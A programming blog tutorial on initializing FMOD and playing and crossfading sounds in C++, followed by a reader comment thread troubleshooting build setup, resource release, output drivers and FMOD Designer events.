// Fade is over if song 2 has reached full volume if (volume == 1.0f) { fading = false; channel1->setPaused(true); channel1->setVolume(1.0f); } // Translate linear volume into a smooth sine-squared fade effect volume = static_cast<float>(sin(volume * M_PI / 2)); volume *= volume; // Fade song 1 out and song 2 in channel1->setVolume(1.0f - volume); channel2->setVolume(volume); } } // Free resources FMODErrorCheck(song1->release()); FMODErrorCheck(song2->release()); FMODErrorCheck(effect->release()); FMODErrorCheck(system->release()); }
For A Quick & Dirty Solution
I have made a simple FMOD library which wraps all of the code above and the code in subsequent parts of the series up into an easy-to-use class. Check out the link for more information.
Coming Up…
In Part 2 of our series on FMOD we will take a look at channel groups. I hope you found this tutorial introduction useful!!
Hello Katy!
Are you sure about the bit about releasing the system also releasing the loaded sound objects? I’m somewhat confused by the documentation, which I quote:
“Call System::release to close the output device and free all memory associated with that object. Channels are stopped, but sounds are not released. You will have to free them first. You do not have to stop channels yourself. You can of course do it if you want, it is just redundant, but releasing sounds is good programming practice anyway. ”
The second sentence seems to make clear that sounds are not released automatically, and must therefore be tracked and released manually before the system. This seems counter intuitive though, and the last sentence adds to the confusion.
Hey David,
It looks like you are right, I went back to the FMOD documentation last night and saw those paragraphs too. But if you go to the documentation for System::close(), which is called by System::release(), it says:
“Closing the output renders objects created with this system object invalid. Make sure any sounds, channelgroups, geometry and dsp objects are released before closing the system object.”
So it would appear that while you don’t have to release the channels, you do have to release the sounds. Well spotted! I will update the blog post when I get a moment.
Oh, I’m also glad you just quoted that bit from the close() method, since it made me notice that channel groups also need to be released. I made the assumption that they worked the same as regular channels and did not need to be released.
Blog post updated, thanks 🙂
By the way, if you ever feel like writing another part for this series, one thing that you could describe is how to write directly to the audio buffer for some low level audio programming.
I already had some experience doing that in other APIs such as XNA and Flash, but it took me more time than it should to figure out how to do it in FMOD – I couldn’t find much about it in the documentation, and forgot to look into the example projects. For the record, here’s what I did.
The process turned out to be creating a *looping stream* with the FMOD_OPENUSER flag and a custom FMOD_CREATESOUNDEXINFO object using a PCM read callback set to write the data to it.
Besides this callback, I also needed to specify the size of the info structure, the format of the audio (e.g. PCM16 or PCMFLOAT), the default frequency (44100), the number of channels (2), the size of the decode buffer (depends), and the length of the stream, which I set to the equivalent of five seconds of audio (frequency * bitrate * channels * 5).
I’m always open to suggestions 🙂 Although it depends mostly on my time and health (the last 2 years, mostly the latter). I’ve never tried that in FMOD but I’m glad you threw in some pointers to save me the head-scratching if I do decide to write about that. I’ve done that in one API and it was many years ago (might have been a WAV writer for Winamp, can’t quite remember), I seem to remember it was basically a case of running it in a separate thread and making sure the buffer never under-ran.
If you really want me to blog about that for others and you have a source code sample, feel free to post it on pastebin and I’ll re-factor it with comments and explanations. No promises on a timeline 🙂
I did not get around to implementing any significant sample for this, as I was mostly just playing around. But the following FMOD official example is a good starting point, although it can be trimmed a lot.
And here’s the callback I used to produce a sine wave with controllable volume and frequency (in this case it was in C#):
Doesn’t look as traumatic as I was expecting. I’ve saved the source files so I may take a look at that when I’ve caught up with all the platform game articles. Thanks!
I’ve spent the night writing a couple of nice clean examples using the official demo code, your C# example, and some other bits and pieces I found on the interwebs, and added some other example sounds (sawtooth, square wave and white noise). I’ll get around to blogging it in the next few days hopefully 🙂
Could you tell me if there is any C++ specific gotcha which would make it preferable to do:
FMOD_RESULT result = whatever();
FMODErrorCheck(result);
Instead of:
FMODErrorCheck(whatever());
Or is it just a matter of style?
Unless you want to use result later (in which case you need to do the first version), or you want to be really pedantic about allocating 4 bytes on the stack until result goes out of scope, it is as far as I know purely a matter of personal preference 🙂
Any idea whether it’s possible to drive 2 soundcards with 1 FMOD program?
I haven’t tried it but I believe that is perfectly possible. You just need to create (as far as I know) multiple instances of FMOD::System and assign each one to a different sound card. The documentation for System_Create states “Use this function to create 1, or multiple instances of FMOD System objects” which I assume means you can run more than one FMOD engine from the same process. Presumably any sounds you want to play on two or more sound cards have to be loaded twice or more as each sound is owned by a single FMOD::System instance, but I haven’t checked.
Call System::getNumDrivers to get the number of (logical) sound cards on the system, ie. the number of outputs. Call System::getDriverInfo to get the name of each device. Each device has an ID in FMOD from zero to n-1 where n is the output of System::getNumDrivers. When you have selected the sound cards you want to use, call System::setDriver(int driverID) to re-direct all output to the desired device.
Hope that helps!
Realizing it’s been almost exactly a year, note that I’ve tried this only today, and indeed it works! I have 2 soundcards and am able to drive both independently this way.
Wow, a year already, feels like I wrote this article last month! Good to know it works that way 🙂
Hello, I’m a student from South Korea. I am trying to use FMOD in the platform of MFC.
This is Almost my first time of using a library such as FMOD.
My first goal is to Play a music of Audio.mp3. I have saved a music file named Audio.mp3 in my Project folder. However, error occured when I’m using the function system->createSound / createStream / playSound
My first prediction was that, I couldn’t understand of including Post Built Event. copy /y “C:\Program Files (x86)\FMOD SoundSystem\FMOD Programmers API Windows\api\fmodex.dll” “$(OutputPath)”
Eventhough I have Copied my Post Built Event same as above, an error was sent in the OutputPath. Do i need to Change the OutputPath?
If the Post Built Event had nothing to do with compliling, what should have been the problem..? I’d be waiting for your advice. T_T..
void CMy111Dlg::OnBnClickedButton1()
{
InitFMOD();
}
void CMy111Dlg::ERRCHECK(FMOD_RESULT result)
{
CString strText;
if(result!=FMOD_OK)
{
strText.Format(_T(“FMOD 오류”),FMOD_ErrorString(result));
MessageBox(strText,_T(“FMOD error!!”),MB_OK);
num++;
exit();
}
So, did it compile or not? And what was the error?
Also the code contains a call to ‘versioncreateSound’; that won’t compile ofcourse (but that seems too trivial to be your problem).
I’ve copied another source of mine. The source i’ve used);
}
In the compiling process there was no errors. However, when i executed my program.
The ERRCHECK(result) function sent me that a problem had occured during createSound / createStream / playSound.
If i had the ERRCHECK(result) line deleted and executed my program.
A popup messagebox was sent that there was a critical problem and the program was terminated.
Thank you for replying 🙂
I’ve used result = system->createSound(“Audio.mp3”, FMOD_DEFAULT, 0, &audio); !!!!
when i Post my comment it is transfered to if(versioncreateSound……. I don’t know why;;
Ok, but also this:
result = system->playSound(FMOD_CHANNEL_FREE, audio, false,0);
I’m not sure sure if playSound() accepts a 0 for the channel to return. Better to pass &channel rather than 0. I debug mode you should get a call stack where you can check which call (in your code) exactly gave the crash, so you can check the arguments/variables being used.
I’ve found my problem;……
My Audio.mp3 file was named incorrectly..T_T
When I have another problem I’d like adivce.
Heya there! I’d like to ask a simple question( but with a possible complex answer). I’ve been following this tutorial, but half-way through I stopped because it’s late at night and I don’t want to waste time.
My simple purpose was to have a car engine acceleration done that I could control how I’d like. Through a couple of google searches I’ve arrived at this tutorial:
This prove to be a promising path to follow, so I ended up having some engine sounds and doing that. Next I downloaded the API.
The problem is that I want to somehow integrate the Designer project with a C++ program written with the FMOD API. Is this easy or really hard? As in the video, I would only need to control the “RPM” value. Can you point me to some resources\tutorials or if it isn’t that hard, can you please suggest me something from the reference?
Please keep in mind that I’m quite a beginner.
I’m sorry, I don’t have any experience with the FMOD Designer, only the code side… perhaps another reader can help you 🙂
It’s not that hard, but not particularly easy.
I would recommend checking the official car engine sample that comes with FMOD Designer and reading the documentation. If I remember correctly, the sound event is composed by two layers – one for when the engine is under load (i.e. accelerating), and another for when it is not (i.e. decelerating). Then there is a “load” parameter that you set from your game which determines which of the two layers should be used, with a 50/50 mix of both in the middle. Then, on the horizontal axis comes the “rpm” parameter. There are four or five different sounds recorded at different rpm values, all placed side by side on the layers. These sounds overlap a bit and cross-fade so that the transitions are smoother, and they use the “auto-pitch” feature of FMOD Designer which basically increases the pitch gradually based on the value of the “rpm” value.
So, what I suggest is that you start with the official car engine sample that comes with FMOD Designer, save that in a project and load the project into your game. Then what you need to do is update the “rpm” and “load” parameters based on values coming from your game. The main problem will probably be making the rpm and load values vary consistently and in a realistic fashion.
Loading a FMOD designer project, playing a sound event and changing parameters is easy and very similar to initializing the regular audio system and playing a regular sound. It’s something like:
// Create an event system object
FMOD::EventSystem* eventSystem;
FMOD::EventSystem_Create(&eventSystem);
// Initialize the event system and load the project
eventSystem->init(100, FMOD_INIT_NORMAL, 0, FMOD_EVENT_INIT_NORMAL);
eventSystem->load(“project.fev”, 0, 0);
…
// Get a reference to the event
FMOD::Event* event;
eventSystem->getEvent(“ProjectName/EventGroupName/EventName”,
FMOD_EVENT_DEFAULT, &event);
// Begin playing the event
event->start();
…
// Get a reference to the parameter
FMOD::EventParameter* parameter;
event->getParameter(“ParameterName”, ¶meter);
// Change the value of the parameter
parameter->setValue(2.0f);
…
// Update event system every frame
eventSystem->update();
// Release event system when we are done
eventSystem->release();
Is there a way to tell when a sound finishes playing in FMOD?
Love the blog btw Katy
Yes, you can poll the channel on which the sound is being played with Channel::isPlaying(bool *playing) which sets the pointer to false when the sound has finished playing. You need to fetch the sound’s channel when you call playSound() to be able to poll the correct channel.
Thanks for the compliments!
There’s also an event based solution 🙂 Use the Channel::setCallback() method to register a callback on the channel that is playing the sound. Then there is a parameter on your callback function which tells you the type of the callback, and all you have to do is check if it corresponds to FMOD_CHANNEL_CALLBACKTYPE_END and handle it accordingly.
Nice. I was looking in the docs for the previous poster for an event but I looked at FMODCREATESOUNDEX or whatever it’s called and couldn’t find one.
Trying to use your tutorial to get started… The FMOD_CAPS is reading as undefined. I have tried including all the headers in the fmod pack but it is still not working. Do you know which header this thing is in?
You should include the main header fmod.hpp (for the C++ interface), that’s the only one you need and FMOD_CAPS will then be defined 🙂
I have included fmod.hpp, FMOD_CAPS is still not working for me.
Then I could only suggest that your download was somehow corrupt. Uninstall the FMOD API altogether and download the latest version from fmod.org and try again. I promise you that FMOD_CAPS is defined in that header 🙂
I still can’t get FMOD_CAPS to respond. Perhaps you can tell me how to properly install/link the fmod API files to VS2012 (I am making a game with openGL atm), I did see some .a files in the low-level api folder, I don’t know what to do with those. Currently, I am simply putting the fmod folders into my c/program files(x86)/VC/bin, etc. Is there something else I need to do?
Define ‘not working’? In C++ I do this:
FMOD_CAPS caps;
// Try to use system default speakermode
fmodSystem->getDriverCaps(0,&caps,0,&systemSpeakerMode);
The FMOD_CAPS type comes from fmod.h. If you want to check if you’re including that .h files, why not insert an #error line somewhere? At the top should give you a clue whether you’re including the right file. Near the ‘FMOD_CAPS’ typedef in fmod.h would give you a clue whether the preprocessor gets to the typedef.
By not working, I mean that VS is reading FMOD_CAPS as undefined, even though I have #include “fmod.hpp”, which should have “fmod.h” (I’ve tried including “fmod.h” too without success). How would you use an #error line? I haven’t heard of this feature before.
#error works just like the other #’s (#ifdef etc). So you get:
#ifdef FMOD_H
#error we are here
#endif
This gives a compiler error, which is useful in tracking which (if any) part of the .h is actually processed. This can give clues as to why it never passes the FMOD_CAPS line. If you don’t get an error at all even if you put an ‘#error’ line at the top, this means you’re not including the file that you think you are!
Note that I use this in Visual Studio; not sure if other compilers support it. Very handy though.
I downloaded the demo, tried to run it and got
Any idea why?
Probably that you tried to compile it as a Windows application so it was looking for WinMain() as the entry point. Change the configuration to Console application instead.
Sounds like you didn’t include WinMain() in your project – which you don’t need because the example is a console application, so just change the project type to Console Application and you should be good to go 🙂
Katy.
Hello again, Katy!
I wonder if you could help me – programming in Linux with FMOD worked fine for me, but now I wanted to try to port my code onto Windows. So I changed some Linux’s functions to ones working under Windows, pasted whole code into Visual Studio 2010. Then I included everything as you have said at the beginning of this tutorial to MVS. I also included stdafx.h at the beginning of all includes due to the fact that precompiled headers should be included that way.
Nonetheless, building solution still won’t work. I’m getting errors like:
And then a lot of errors pertaining to not being able to identify used FMOD functions. I have never used Visual Studio before so I need someone’s guidance with my problem. What should I do?
Thank you in advance.
Winged
Problem solved. I did not notice that I’d included fmod.h instead of fmod.hpp ;x
hey, I copy pasted your demo but I don’t hear any sound. No errors, it compiles and everything, I just can’t hear the .mp3 I specified ! any clues ? great blog btw !
Check that the demo is outputting the sound on a channel on your sound card that you can actually hear, ie. the front speakers or headphones 🙂
how do you do that ? with
system->playSound(FMOD_CHANNEL_FREE, audio, false,0);
?
thanks!
Enumerate the playback drivers and check their names to see which one corresponds to your speakers/headphones. I haven’t tested this code but try something like:
Once you’ve found the ID of the driver you want to output on, use:
Note that a value of 0 (zero) uses the OS-default driver as determined in your sound settings in Control Panel.
Katy.
Hello,katy,i come from China and i am just confused about the statement ” while (GetAsyncKeyState(‘2’));” and so on.Could you give me some details about it?
That line simply stalls the code until the user releases the ‘2’ key, so that the action of pressing 2 is only triggered once each time it is pressed rather than repeatedly. Hope that helps!
Hi, Katy i have configure all the above settings in my VS2013 but still am getting an error message can you help me out on this….
1>—— Build started: Project: again1, Configuration: Debug Win32 ——
1> Parse Error
1> The filename, directory name, or volume label syntax is incorrect.
1>C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: The command “xcopy /y “C:\FMOD\
1>C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: api\fmodex.dll” “c:\users\hack1on1\documents\visual studio 2013\Projects\again1\Debug\”
1>C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: :VCEnd” exited with code 123.
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========
It’ll be great if you can find out the solution…. Regards
Here’s the step i did with my VS2013 Am I missing something?? And i did copy and paste “fmodex.dll” in my working folder… But still am getting an error link like identifier not found, undeclared identifier and so and so….please help…
First step =
Second step =
Third step =
Final step =
here’s the other trouble am having for a quite long time
And to be totally honest i don’t think am having a problem linking my library file’s cause am getting a perfect output
| https://katyscode.wordpress.com/2012/10/05/cutting-your-teeth-on-fmod-part-1-build-environment-initialization-and-playing-sounds/ | CC-MAIN-2018-17 | refinedweb | 5,549 | 60.85 |
I've been encountering an issue with the Swift REPL for a while now, and chalked it up to being some kind of issue with my local environment. That is, until I got a new computer and the issue was happening there too. This has been happening consistently with Swift 5.2.4/Xcode 11 and Swift 5.3/Xcode 12. Stranger still, it used to not happen with Swift 5.2.4 - but then just started seemingly out of nowhere.
The Swift REPL consistently complains when I try to import SwiftPM modules, saying that it can't lookup the symbols. This is strange, but the code has no problem running in tests — just the REPL.
Here's a quick example of how to maybe reproduce this. For me, it happens with any SwiftPM library, so the specific one doesn't matter.
$ mkdir Example $ cd Example $ swift package init --type library
Edit Sources/Example/Example.swift to look like so:
public struct Example { var text = "Hello, world!" public init() {} }
Next, launch the REPL.
$ swift run --repl ... 1> #if canImport(Example) 2. print("Proceed") 3. #endif Proceed 4> import Example 5> let example = Example() example: Example.Example = { text = { _guts = { _object = { _countAndFlagsBits = <extracting data from value failed> _object = <extracting data from value failed> } } } } error: Couldn't lookup symbols: Example.Example.init() -> Example.Example Example.Example.init() -> Example.Example
It's really strange, isn't it?
If it's helpful I can include a log of what LLDB logs, but it's a lot. Let me know if anyone else is having this issue or what I can do to fix it! Thanks. | https://forums.swift.org/t/is-this-repl-issue-a-bug-or-specific-to-my-environment/40659 | CC-MAIN-2021-31 | refinedweb | 270 | 59.19 |
You can subscribe to this list here.
Showing
3
results of 3
It seems like there are three things going on here:
1. Customizing classes
2. Access privileges
3. Directory inheritance
I think 1. definitely goes into the existing
WebKit/Configs/Application.config file. It would also be cool if WebKit
would automatically pick up and use classes in applications that had the
same name. e.g. you could just make a Session class that inherits from
WebKit.Session and it would be used by convention of it's name. This
wouldn't replace the configuration capability; it would just be a convenience.
Note that application does take arguments for the various classes and
stores them as attributes. It then uses those when creating new sessions,
requests, etc. So we're half way there. It's the config that's missing (as
Dan has pointed out).
2. Access priv.: Not really sure how this should work. I certainly don't
mind if someone takes a crack at it. Does this mean having classes like
Role, User, etc.?
Or is using the authentication of the HTTP server possible and sufficient?
3. Directory inheritance: A Zope-/Quixote-inheritance scheme could be a
useful thing, although there's obviously a performance hit for such things
(e.g., scanning through each directory). That's why I prefer to use class
inheritance rather than directory inheritance: It's all in memory and
generally faster. But I can still see the utility of directory inheritance
for easier configuration and better file system organization.
To get started, it might be useful to create a Page class/mix-in that
offers methods such as:
property()
setProperty()
object()
setObject()
That are able to use files in directories under predetermined conventions.
I'm picturing that properties are dictionary oriented, with the closest
dictionaries being overlayed as you travel up the directory chain. In each
directory there would be a Properties.config file. You would want to cache
these and check the timestamps to have an efficient process while still
having the ability to update them on disk at any time.
The objects would be larger things like graphics files or HTML fragments
that are searched for up the directory chain and found according to
filename. These could also be cached by time stamp.
You could also map extensions to Python classes, so that when an object is
asked for, the class is instantiated with it and that's what you get.
For properties, you could special case dictionaries that have a key called
'class'. For such dictionaries, the dictionary would be replaced by an
instance of the class which would receive the readProperties() message.
These are just some brainstorming ideas on my part to warm up the conversation.
With regards to 2 & 3, what I'd really like to see are WebKit plug-ins
rather than a new versions of WebKit.
The reasons are:
* Plug-ins can be developed independently of each other.
* People can then embrace as much or as little of the services we
provide as what they want.
* People can provide alternative versions of our services if they think
they know how to do it better/faster.
* Continuing with the plug-in architecture will encourage more plug-ins
and Webware will evolve faster.
I'm more than willing to guide people in creating plug-ins. It's really
just a small set of conventions for laying out your directories and files
and making a function that lets you hook into WebKit at load time.
With regards to config files, I definitely prefer good ol' Python
dictionaries rather than a custom format. Python config files allow for
infinitely recursive dictionaries and lists and the only thing we have to
do is eval().
Again, if people want to take a crack at plug-ins like this, I will
certainly lend you a hand in ideas, testing, reviews, tech help on Webware,
etc.
Provided something is produced that is useful, tested, documented and
follows Webware conventions, we could put it in and you could aquire fame
and fortune. Well, at least fame. :-)
Thoughts?
-Chuck
I was thinking of writing something similar to Apache's .htaccess, to
provide things like:
- Class names for Application, Session, etc. so that people can subclass
these and then let WebKit know to use their own classes
- Access privileges (automated authentication handlers? that would rule...)
A typical config would look like:
[/Main/Webmail] # if you were writing a Webmail component ... I know I'm not
:)
ApplicationClass = WebMailApplication
SessionClass = WebMailSession
Authenticator = WebMailAuthenticator
or, if we prefer to use just plain ol' Python:
from WebMailLib import *
{
'/Main/Webmail' :
{
'ApplicationClass' : WebMailApplication
'SessionClass' : WebMailSession
'Authenticator' : WebMailAuthenticator
}
}
Of course, this is all easily extensible, so future config options are
possible. Alternatively, we could read them in per-directory, so that
/Main/Webmail would just be implied by its location in
/.../WebKit/Main/Webmail. I think it's something that needs to be done
eventually, and I'm offering. :)
I think that it should be recursive a-la Zope, such that config directives
for /Main/Webmail are assumed for /Main/Webmail/POP and /Main/Webmail/IMAP,
for example.
Let me know what format would be best, what config options should be done
ASAP, etc.
Or is there a facility for doing this that I just haven't noticed yet?
Dan Green
At 12:59 PM 8/19/00 -0700, Weiss Blitz wrote:
!
Thanks for the compliments.
...
My preferred method for caching such things is to subclass Application.
Unfortunately, there is no setting right now to tell WebKit to use your
subclass, so you have to tweak the "createApplication()" method AppServer
to use it.
This might be interesting. I've actually only been caching things in pages
right now, so we'll see how the details fall out.
Another technique, is to put an __init__.py in your context and add a
method to Application:
__init__.py:
---
def news(self):
if not hasattr(self, '_news'):
self._news = magicalNewsGrabber()
return self._news
from Application import Application
Application.news = news
---
Now in your pages, you can say:
self.application().news()
And get the object (which I presume is a list containing news records/objects).
I know Jay likes the Cans technique, but my preference is to simply have
methods named after the appropriate objects they return, accessible in
either my page or my application.
Another good technique regardless of this, is to create a SitePage class
that inherits from WebKit's Page. In this page, you put specific utilities,
services, data, etc. to your web site and make all other pages inherit it.
BTW are you using the 0.3 distribution of the CVS repository?
>Also, this might sound dumb, but, what is your
>favorite IDE or editor under Linux to develop Python
>apps? Kedit and Kwrite don't cut it and emacs is too
>foreign to me (I don't want to go thru the learning
>curve of new editing ctrl-c+???? commands).
My development environment is:
* Windows 98
* Ultra-Edit ()
* Python 1.5.2
* Webware (latest snapshot)
* Internet Explorer 5.01
* OneShot adapter
My deployment environment is:
* Free BSD
* Py 1.5.2
* Webware
* OneShot adapter (soon to be WebKit adapter)
I really like this set up. I find the Windows desktop much more productive
than I did the Linux desktop. I find BSD to be the best server side
operating system.
>Keep up the good work guys!
Speaking of which, we'll be releasing a 0.4 "sometime real soon". We're
still squashing the final bugs and beefing up the docs.
Also, you will have lots of questions as you develop your app. Feel free to
continue asking.
-Chuck | http://sourceforge.net/p/webware/mailman/webware-discuss/?viewmonth=200008&viewday=20 | CC-MAIN-2014-41 | refinedweb | 1,278 | 57.67 |
How to Simulate Key Presses in Python
I have been searching the web but have been unable to find ANYTHING that is for Linux and that can type sentences, not just letters. I have a Tkinter textbox and I have been trying to find out how to make the program be able to type in the Tkinter textbox. For solutions, I have found things like the SendKeys module but these don't work as they are only for Windows. So if anyone knows how to make python code be able to type in a Tkinter textbox, or know a module that simulates keypresses in python, PLEASE let me know. Thanks!
Voters
is this good?
If that doesn't work, then try pyautogui
If neither work, that means repl.it is bad, and you should report to bugs
gl@Futuristics
send repl@Futuristics
aweesome gl@Futuristics
send the error@Futuristics
File "main.py", line 5, in
import pyautogui
File "/opt/virtualenvs/python3/lib/python3.8/site-packages/pyautogui/init.py", line 242, in
import mouseinfo
File "/opt/virtualenvs/python3/lib/python3.8/site-packages/mouseinfo/init.py", line 223, in
_display = Display(os.environ['DISPLAY'])
File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/display.py", line 80, in init
self.display = _BaseDisplay(display)
File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/display.py", line 62, in init
display.Display.init(*(self, ) + args, **keys)
File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/protocol/display.py", line 53, in init
name, host, displayno, screenno = connect.get_display(display)
File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/support/connect.py", line 62, in get_display
return mod.get_display(display)
File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/support/unix_connect.py", line 47, in get_display
raise error.DisplayNameError(display)
Xlib.error.DisplayNameError: Bad display name "MAGIC"
oh, use pygame instead@Futuristics
oh wait you are already on a repl that has a pre-built display?@Futuristics
so pygame and tkinter repls have a built-in display@Futuristics
oh, make a tkinter repl@Futuristics
Error:
Repl.it: Installing fresh packages
ERROR: Can not perform a '--user' install. User site-packages are not visible in this virtualenv.
WARNING: You are using pip version 20.1.1; however, version 20.2.3 is available.
You should consider upgrading via the '/opt/virtualenvs/python3/bin/python3 -m pip install --upgrade pip' command.
Repl.it: package installation failed! | https://replit.com/talk/ask/How-to-Simulate-Key-Presses-in-Python/56681?order=votes | CC-MAIN-2022-27 | refinedweb | 406 | 52.76 |
Setting up OpenGL (was: XCode's fault or Mine?)
so, when I try and like build and run this code in XCode (Carbon Application) XCode "unexpectedly quits"
The code is as follows:
----------------
----------------------
The code is as follows:
----------------
Code:
#include <Carbon/Carbon.h>
#include <OpenGL/gl.h>
#include <OpenGL/glu.h>
#include <OpenGL/glext.h>
CFDictionaryRef newMode;
CFDictionaryRef originalMode;
size_t desiredBitDepth = 32;
size_t desiredWidth = 1024;
size_t desiredHeight = 768;
boolean_t exactMatch;
int main() {
originalMode = CGDisplayCurrentMode( kCGDirectMainDisplay );
newMode = CGDisplayBestModeForParameters (
kCGDirectMainDisplay,
desiredBitDepth, desiredWidth,
desiredHeight, &exactMatch);
if (NULL != newMode) {
CGDisplayCapture( kCGDirectMainDisplay );
CGDisplaySwitchToMode ( kCGDirectMainDisplay, newMode);
CGDisplayHideCursor( kCGDirectMainDisplay);
glClearColor( 0,0,0,1);
glClear( GL_COLOR_BUFFER_BIT);
glColor3f(0.0f, 1.0f, 0.0f);
glBegin( GL_TRIANGLES); {
glVertex3f (-1.0f, 1.0f, 0.0f);
glVertex3f (1.0f, 1.0f, 0.0f);
glVertex3f (0.0f,-1.0f, 0.0f);
}
glEnd();
glFlush();
CGDisplayShowCursor( kCGDirectMainDisplay);
CGDisplaySwitchToMode( kCGDirectMainDisplay, originalMode);
CGDisplayRelease( kCGDirectMainDisplay);
}
return 0;
}
It has been a while since I messed with OpenGL, but as far as I can tell you never create an OpenGL context. Needless to say, if that is the case then it is the cause of your crash.
Moderator
Posts: 3,591
Joined: 2003.06
Joined: 2003.06
I don't know, but after a quick glance through your code I can see there are several problems with it -no context, no drawing loop!, etc. I would highly recommend going to and reading through some of the tutorials there. I think the first few are in Carbon so that should help out.
and ah, how do you set up said OpenGL Context? I've been to NeHe but waht they tell you to do to set up a rendering context etc. doesn't work and is apparently PC code.
Also, this thread probably should've been started in the OpenGL forum, so sorry.
sorry for my n00bishness =)
-Mark
Also, this thread probably should've been started in the OpenGL forum, so sorry.
sorry for my n00bishness =)
-Mark
Moderator
Posts: 3,591
Joined: 2003.06
Joined: 2003.06
I just checked the NeHe code for you and it's either GLUT or Cocoa, although GLUT is Carbon. Go GLUT to begin with. You won't need to set up a context for GLUT since it handles that for you automatically. NeHe does indeed have most of the lessons downloadable for the Mac so don't be misled. You'll only have to read through minimal PC oriented tutorial stuff. The actual Mac download will contain the corrected code that you are interested in and you can extrapolate from there with relative ease. Here's the link to learn how to set up GLUT for OS X: It's a little out of date but if you have any questions about it I'm sure someone can help you here. Be sure to look at the bottom of each lesson to find the relevent Mac code download.
Okay guys, thanks for all your help but I've decided to go in a slightly different direction. I'm going to like get a better grasp of C, then learn Cocoa, and then do OpenGL through that.
Well, that's this weeks plan, at least ^^
-Mark
Well, that's this weeks plan, at least ^^
-Mark
Good plan. OpenGL programming is unlike other programming on OS X, because it has the tendency to freeze or kernel panic your entire machine. You also *have to* check your results on several different machines, because every video card renders a little bit differently. Get comfortable with regular programming first.
Possibly Related Threads... | http://idevgames.com/forums/thread-6501-post-13039.html | CC-MAIN-2017-30 | refinedweb | 584 | 66.03 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.